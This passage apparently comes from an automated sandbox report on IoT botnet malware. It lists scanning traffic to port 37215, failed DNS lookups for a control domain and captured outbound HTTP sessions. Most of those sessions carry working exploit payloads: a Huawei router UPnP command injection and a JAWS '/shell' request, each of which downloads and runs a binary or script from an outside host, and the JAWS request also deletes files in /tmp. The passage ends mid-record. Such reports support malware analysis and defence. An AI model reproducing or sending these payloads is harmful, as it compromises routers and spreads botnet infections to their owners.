                                                Dec 3, 2024 22:16:55.079524994 CET3745137215192.168.2.23156.172.142.168
                                                Dec 3, 2024 22:16:55.079524994 CET3745137215192.168.2.23197.217.225.171
                                                Dec 3, 2024 22:16:55.079524994 CET3745137215192.168.2.2341.221.145.219
                                                Dec 3, 2024 22:16:55.079524994 CET3745137215192.168.2.23156.62.235.59
                                                Dec 3, 2024 22:16:55.079529047 CET3745137215192.168.2.23197.141.100.202
                                                Dec 3, 2024 22:16:55.079529047 CET3745137215192.168.2.23156.53.91.56
                                                Dec 3, 2024 22:16:55.079530001 CET3745137215192.168.2.23197.8.141.20
                                                Dec 3, 2024 22:16:55.079530001 CET3745137215192.168.2.23156.237.99.173
                                                Dec 3, 2024 22:16:55.079530001 CET3745137215192.168.2.2341.51.226.88
                                                Dec 3, 2024 22:16:55.079530954 CET3745137215192.168.2.2341.83.21.69
                                                Dec 3, 2024 22:16:55.079530954 CET3745137215192.168.2.2341.153.249.38
                                                Dec 3, 2024 22:16:55.079530954 CET3745137215192.168.2.23156.245.177.132
                                                Dec 3, 2024 22:16:55.079530954 CET3745137215192.168.2.2341.158.138.203
                                                Dec 3, 2024 22:16:55.079530954 CET3745137215192.168.2.23156.230.41.6
                                                Dec 3, 2024 22:16:55.079530954 CET3745137215192.168.2.23156.247.151.246
                                                Dec 3, 2024 22:16:55.079541922 CET3745137215192.168.2.23197.24.31.40
                                                Dec 3, 2024 22:16:55.079547882 CET3745137215192.168.2.23156.237.106.25
                                                Dec 3, 2024 22:16:55.079547882 CET3745137215192.168.2.2341.108.137.182
                                                Dec 3, 2024 22:16:55.079552889 CET3745137215192.168.2.2341.123.138.140
                                                Dec 3, 2024 22:16:55.079552889 CET3745137215192.168.2.2341.38.7.97
                                                Dec 3, 2024 22:16:55.079552889 CET3745137215192.168.2.23156.215.104.238
                                                Dec 3, 2024 22:16:55.079555035 CET3745137215192.168.2.23156.119.212.151
                                                Dec 3, 2024 22:16:55.079555035 CET3745137215192.168.2.2341.76.194.110
                                                Dec 3, 2024 22:16:55.079555035 CET3745137215192.168.2.23156.217.125.195
                                                Dec 3, 2024 22:16:55.079555988 CET3745137215192.168.2.23156.134.110.71
                                                Dec 3, 2024 22:16:55.079555988 CET3745137215192.168.2.23156.6.5.91
                                                Dec 3, 2024 22:16:55.079560041 CET3745137215192.168.2.23197.10.83.240
                                                Dec 3, 2024 22:16:55.079560041 CET3745137215192.168.2.23197.223.154.43
                                                Dec 3, 2024 22:16:55.079560041 CET3745137215192.168.2.2341.28.90.14
                                                Dec 3, 2024 22:16:55.079560041 CET3745137215192.168.2.23197.211.178.69
                                                Dec 3, 2024 22:16:55.079560995 CET3745137215192.168.2.23156.99.115.22
                                                Dec 3, 2024 22:16:55.079560995 CET3745137215192.168.2.2341.223.71.8
                                                Dec 3, 2024 22:16:55.079560995 CET3745137215192.168.2.2341.89.233.105
                                                Dec 3, 2024 22:16:55.079560995 CET3745137215192.168.2.2341.116.215.169
                                                Dec 3, 2024 22:16:55.079560995 CET3745137215192.168.2.23156.233.157.81
                                                Dec 3, 2024 22:16:55.079567909 CET3745137215192.168.2.23156.157.45.108
                                                Dec 3, 2024 22:16:55.079567909 CET3745137215192.168.2.2341.73.228.131
                                                Dec 3, 2024 22:16:55.079567909 CET3745137215192.168.2.23197.147.213.99
                                                Dec 3, 2024 22:16:55.079567909 CET3745137215192.168.2.2341.16.107.206
                                                Dec 3, 2024 22:16:55.079570055 CET3745137215192.168.2.23156.184.225.79
                                                Dec 3, 2024 22:16:55.079572916 CET3745137215192.168.2.2341.15.252.98
                                                Dec 3, 2024 22:16:55.079576969 CET3745137215192.168.2.23197.91.104.1
                                                Dec 3, 2024 22:16:55.079576969 CET3745137215192.168.2.23156.217.210.251
                                                Dec 3, 2024 22:16:55.079576969 CET3745137215192.168.2.2341.74.25.20
                                                Dec 3, 2024 22:16:55.079577923 CET3745137215192.168.2.23197.133.49.77
                                                Dec 3, 2024 22:16:55.079577923 CET3745137215192.168.2.23197.17.98.49
                                                Dec 3, 2024 22:16:55.079580069 CET3745137215192.168.2.23156.6.27.56
                                                Dec 3, 2024 22:16:55.079585075 CET3745137215192.168.2.2341.121.20.53
                                                Dec 3, 2024 22:16:55.079586029 CET3745137215192.168.2.2341.219.124.29
                                                Dec 3, 2024 22:16:55.079586029 CET3745137215192.168.2.23156.117.158.250
                                                Dec 3, 2024 22:16:55.079592943 CET3745137215192.168.2.23197.199.249.208
                                                Dec 3, 2024 22:16:55.079592943 CET3745137215192.168.2.23197.158.238.215
                                                Dec 3, 2024 22:16:55.079592943 CET3745137215192.168.2.23156.255.33.83
                                                Dec 3, 2024 22:16:55.079592943 CET3745137215192.168.2.23197.6.207.106
                                                Dec 3, 2024 22:16:55.079602957 CET3745137215192.168.2.23197.194.161.34
                                                Dec 3, 2024 22:16:55.079602957 CET3745137215192.168.2.23156.66.234.172
                                                Dec 3, 2024 22:16:55.079602957 CET3745137215192.168.2.2341.123.95.53
                                                Dec 3, 2024 22:16:55.079606056 CET3745137215192.168.2.2341.103.203.202
                                                Dec 3, 2024 22:16:55.079606056 CET3745137215192.168.2.23156.0.224.238
                                                Dec 3, 2024 22:16:55.079606056 CET3745137215192.168.2.23197.86.48.34
                                                Dec 3, 2024 22:16:55.079607964 CET3745137215192.168.2.23197.134.38.237
                                                Dec 3, 2024 22:16:55.079607964 CET3745137215192.168.2.2341.179.234.209
                                                Dec 3, 2024 22:16:55.079607964 CET3745137215192.168.2.2341.53.81.33
                                                Dec 3, 2024 22:16:55.079607964 CET3745137215192.168.2.23197.83.223.244
                                                Dec 3, 2024 22:16:55.079612017 CET3745137215192.168.2.23156.70.89.86
                                                Dec 3, 2024 22:16:55.079612017 CET3745137215192.168.2.2341.66.127.167
                                                Dec 3, 2024 22:16:55.079613924 CET3745137215192.168.2.2341.31.72.29
                                                Dec 3, 2024 22:16:55.079613924 CET3745137215192.168.2.23156.218.35.99
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 3, 2024 22:16:44.355576992 CET192.168.2.238.8.8.80x3c3fStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:16:44.853741884 CET192.168.2.238.8.8.80x3c3fStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:16:45.328973055 CET192.168.2.238.8.8.80x3c3fStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:16:45.580636024 CET192.168.2.238.8.8.80x3c3fStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:16:45.835470915 CET192.168.2.238.8.8.80x3c3fStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:09.274843931 CET192.168.2.238.8.8.80xc670Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:09.525507927 CET192.168.2.238.8.8.80xc670Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:09.777903080 CET192.168.2.238.8.8.80xc670Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:10.028465986 CET192.168.2.238.8.8.80xc670Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:10.279325008 CET192.168.2.238.8.8.80xc670Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:33.588149071 CET192.168.2.238.8.8.80x3709Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:33.982841969 CET192.168.2.238.8.8.80x3709Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:34.456000090 CET192.168.2.238.8.8.80x3709Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:34.704864979 CET192.168.2.238.8.8.80x3709Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:35.096823931 CET192.168.2.238.8.8.80x3709Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:58.360022068 CET192.168.2.238.8.8.80x9f1eStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:58.610483885 CET192.168.2.238.8.8.80x9f1eStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:58.860461950 CET192.168.2.238.8.8.80x9f1eStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:59.333049059 CET192.168.2.238.8.8.80x9f1eStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:59.583846092 CET192.168.2.238.8.8.80x9f1eStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:18:22.892375946 CET192.168.2.238.8.8.80xca11Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:18:23.143529892 CET192.168.2.238.8.8.80xca11Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:18:28.148566961 CET192.168.2.238.8.8.80xca11Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:18:28.399873972 CET192.168.2.238.8.8.80xca11Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:18:28.653104067 CET192.168.2.238.8.8.80xca11Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 3, 2024 22:16:44.852674961 CET8.8.8.8192.168.2.230x3c3fName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:16:45.327717066 CET8.8.8.8192.168.2.230x3c3fName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:16:45.579710960 CET8.8.8.8192.168.2.230x3c3fName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:16:45.834476948 CET8.8.8.8192.168.2.230x3c3fName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:16:46.226123095 CET8.8.8.8192.168.2.230x3c3fName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:09.524956942 CET8.8.8.8192.168.2.230xc670Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:09.777091026 CET8.8.8.8192.168.2.230xc670Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:10.027923107 CET8.8.8.8192.168.2.230xc670Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:10.278438091 CET8.8.8.8192.168.2.230xc670Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:10.528620005 CET8.8.8.8192.168.2.230xc670Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:33.982115030 CET8.8.8.8192.168.2.230x3709Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:34.455485106 CET8.8.8.8192.168.2.230x3709Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:34.704160929 CET8.8.8.8192.168.2.230x3709Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:35.096168041 CET8.8.8.8192.168.2.230x3709Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:35.345403910 CET8.8.8.8192.168.2.230x3709Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:58.609807014 CET8.8.8.8192.168.2.230x9f1eName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:58.859810114 CET8.8.8.8192.168.2.230x9f1eName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:59.332349062 CET8.8.8.8192.168.2.230x9f1eName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:59.583177090 CET8.8.8.8192.168.2.230x9f1eName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:17:59.834933996 CET8.8.8.8192.168.2.230x9f1eName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:18:23.142541885 CET8.8.8.8192.168.2.230xca11Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:18:28.398961067 CET8.8.8.8192.168.2.230xca11Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:18:28.651993990 CET8.8.8.8192.168.2.230xca11Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Dec 3, 2024 22:18:29.125844002 CET8.8.8.8192.168.2.230xca11Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                Session IDSource IPSource PortDestination IPDestination Port
                                                0192.168.2.2359658156.21.203.12237215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:47.502497911 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1192.168.2.2351230197.137.137.13237215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:47.621542931 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2192.168.2.2338366156.41.220.18837215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:47.622314930 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3192.168.2.233455444.97.239.5880
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.532780886 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4192.168.2.2350084141.23.106.5880
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.533075094 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5192.168.2.235480269.105.106.180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.533349037 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6192.168.2.234400293.134.211.18780
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.533982992 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7192.168.2.233657853.119.123.1380
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.608711958 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8192.168.2.235790423.13.227.18080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.609553099 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9192.168.2.2341946108.128.143.2180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.610112906 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10192.168.2.2338168136.30.197.4280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.610702038 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11192.168.2.235380446.29.80.18280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.611241102 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12192.168.2.23513325.50.172.10280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.611862898 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13192.168.2.2335632217.15.168.2580
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.612432003 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14192.168.2.2356994106.125.175.24680
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.613019943 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15192.168.2.2358950213.10.8.15380
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.613612890 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16192.168.2.2349430142.163.169.14880
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.619438887 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17192.168.2.2358412191.107.11.3680
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.627552032 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18192.168.2.2358214159.56.174.21180
                                                TimestampBytes transferredDirectionData
